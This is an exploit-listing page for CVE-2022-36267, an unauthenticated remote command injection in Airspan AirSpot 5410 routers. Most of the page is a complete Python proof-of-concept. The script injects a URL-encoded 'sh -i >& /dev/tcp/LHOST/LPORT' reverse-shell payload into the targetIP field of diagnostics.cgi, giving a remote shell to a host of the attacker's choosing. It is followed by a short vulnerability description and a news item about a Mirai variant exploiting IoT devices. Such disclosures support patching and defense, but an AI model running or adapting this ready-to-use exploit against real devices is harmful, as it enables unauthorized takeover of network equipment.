Headline
AirSpot 5410 0.3.4.1-4 Remote Command Injection
AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.
# -*- coding: utf-8 -*-# Exploit Title: AirSpot unauthenticated remote command injection# Date: 7/26/2022# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)# Vendor Homepage: https://www.airspan.com/# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf# Version: 0.3.4.1-4 and under.# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)# CVE : CVE-2022-36267from __future__ import print_function, unicode_literalsimport argparseimport requestsimport urllib3urllib3.disable_warnings()def banner(): airspanLogo = """ ,-. / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | Airspan |__| AirSpot 5410 /||\ PWNED x_x //||\\ // || \\ __//__||__\\__'--------------'Necrum Security Labs \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(airspanLogo))def pingWebInterface(RHOST, RPORT): url = 'https://{}:{}'.format(RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=30) if response.status_code != 200: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() print('[INFO] Airspan device web interface seems reachable!') except: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit()def execReverseShell(RHOST, RPORT, LHOST, LPORT): payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT) data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload) try: print('[INFO] Executing reverse shell...') response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False) print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT)) return except Exception as e: print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT) return Falsedef main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()
Related news
By Waqas The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022. This is a post from HackRead.com Read the original post: Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.